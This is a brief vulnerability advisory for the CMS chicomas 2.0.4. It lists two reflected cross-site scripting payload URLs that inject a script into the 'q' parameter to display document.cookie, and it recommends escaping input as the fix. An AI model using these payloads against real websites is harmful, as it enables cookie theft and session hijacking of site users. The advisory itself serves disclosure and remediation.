CMS: chicomas.2.0.4
Download CMS : http://garr.dl.sourceforge.net/sourceforge/chicomas/chicomas.2.0.4.zip
Exploit :
Method = POST
query : http://www.example.com/[chicomas]/index.php?q=>"><script>alert(document.cookie)</script>
query : http://www.example.com/[chicomas]/index.php?q="><script>alert(document.cookie)</script>
Solution :
you must filter special character in input via htmlspecialchar() function